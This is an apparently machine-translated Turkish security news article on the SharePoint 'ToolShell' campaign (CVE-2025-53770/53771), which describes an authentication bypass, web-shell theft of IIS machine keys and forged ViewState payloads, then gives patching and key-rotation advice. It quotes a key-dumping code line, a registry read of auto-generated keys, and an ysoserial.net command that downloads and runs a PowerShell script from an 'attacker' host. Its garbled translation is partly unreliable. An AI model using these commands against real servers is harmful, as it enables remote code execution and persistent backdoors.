Microsoft SharePoint’e karşı sıfır gün istismarları, saldırganların IIS makine anahtarlarını çıkarmalarını ve yamalardan ve yeniden başlatmalardan kurtulan kalıcı arka fırınlar oluşturmasını sağlıyor.
Temmuz 2025’in ortalarında, tehdit aktörleri iki kritik SharePoint güvenlik açıklığını kötüye kullanmaya başladı-CVE-2025-53770 (Deserialization, CVSS 9.8) ve CVE-2025-53771 (kimlik doğrulama baypas, CVSS 6.3)-bir saldırı kampanyasında “araç kıyısı” olarak adlandırıldı.
Kampanyanın nihai hedefi, MAC validasyonu ve isteğe bağlı şifreleme yoluyla ViewState, çerezleri ve oturum verilerini koruyan IIS makine anahtarlarını hasat etmektir.
Saldırı Zinciri Genel Bakış
- Kimlik Doğrulama Bypass (CVE-2025-53771):
Saldırganlar hazırlanmış posta istekleri /_layouts/15/toolpane.aspx adresine sahte bir yönlendirici ile gönderir: /_layouts/signout.aspx başlığı, SharePoint’i kimlik doğrulamalı bir duruma kandırır. - Uzaktan Kod Yürütme (CVE-2025-53770):
Bir seansizasyon kusurundan yararlanan saldırganlar, keyfi uç noktalara kötü niyetli yükler göndererek ASPX Web kabuğu dağıtımına yol açar. - Makine Anahtarı Çıkarma:
Dağıtım kabuğu (örneğin, spinstall0.aspx), system.web.configuration.MachinekeYsection yüklemek için yansıma kullanır ve validationKey ve DecryptionKey’i almak için kamuya açık olmayan GetApplicationConfig yöntemini çağırır. Sızan anahtarlar şu şekilde görünür:
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
IIS makine tuşları, SHA1 veya HMACSHA256 MAC’ler üzerinden ViewState bütünlüğünü sağlar ve isteğe bağlı olarak ViewState’i şifreleyin. Varsayılan olarak, ViewState Mac etkinleştirilir, ancak şifreleme “otomatik” (devre dışı) kalır ve verileri anahtarlar sızarsa potansiyel kurcalamaya maruz bırakır.
Geçerli makine tuşlarına sahip olmak, saldırganların çalınan anahtarlarla imzalanmış kötü niyetli görünüm yükü yüklemelerini sağlar. IIS’in losformatter, gadget zincirlerini (örn. TextFormattingRunproperties) kullanarak kod yürütmeyi tetikleyerek bu yükleri söndürür.
Makine tuşları, Web.config (Yönetici tanımlı) veya HKCU \ Software \ Microsoft \ asp.net \
Temel kabuklar, web.config’den anahtarlar çıkarır, ancak Soroush Dalili tarafından olanlar gibi gelişmiş komut dosyaları, sicil kayıt konumları gibi, otomatik olarak oluşturulduğunda bile anahtar hırsızlığı sağlar.
Örnek Kayıt Defteri Okundu:
byte[] key = (byte[])Registry.GetValue(
"HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\",
"AutoGenKeyV4", new byte[]{});Çalınan anahtarlarla saldırganlar, imzalı ViewState yükleri oluşturmak için ysoserial.net kullanır:
ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "powershell -exec bypass -Command 'IEX (New-Object Net.WebClient).DownloadString(\"http://attacker/shell.ps1\")'" \
--validationkey="[KEY]" --validationalg="HMACSHA256" \
--path="/app" --apppath="/app"Bu yükün herhangi bir ASPX uç noktasına gönderilmesi, kalıcı bir arka kapıyı etkili bir şekilde yükleyerek fasili ve uzak kod yürütmeyi tetikler.
CISA, bilinen sömürülen güvenlik açıkları kataloğuna CVE-2025-53770 ekledi ve hemen yama ve anahtar rotasyona çağırdı. Microsoft, PowerShell CMDLET’lerini kullanarak dönen makine tuşlarını ve IIS’yi yeniden başlatmayı önerir:
Set-SPMachineKey
Update-SPMachineKeyAnahtar rotasyon gerçekleşene kadar, çalıntı anahtarlar geçerli kalır ve saldırganların devam eden erişime izin verir.
Bu olaylar sistemik bir sorunu vurgulamaktadır: Kod depolarındaki açık makine anahtarları ve belirlenen 3.000’den fazla açıklanan anahtar – bunları kullanarak herhangi bir ASP.NET uygulaması için derhal bir risk oluşturur. En iyi uygulamalar şunları içerir:
- Statik anahtarlar üzerinde otomatik oluşturulmuş tuşları kullanma
- MAC doğrulamasının yanında ViewState şifrelemesini etkinleştirme
- Periyodik anahtar rotasyon ve denetim yapılandırmalarının uygulanması
SharePoint Toolshell kampanyası, şifreleme anahtar yönetiminin kritikliğinin altını çiziyor.
Kuruluşlar sadece güvenlik açıkları değil, aynı zamanda IIS ortamlarında kalıcı, şifreleme tabanlı arka planları engellemek için makine anahtarlarını proaktif olarak yönetmeli ve döndürmelidir.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!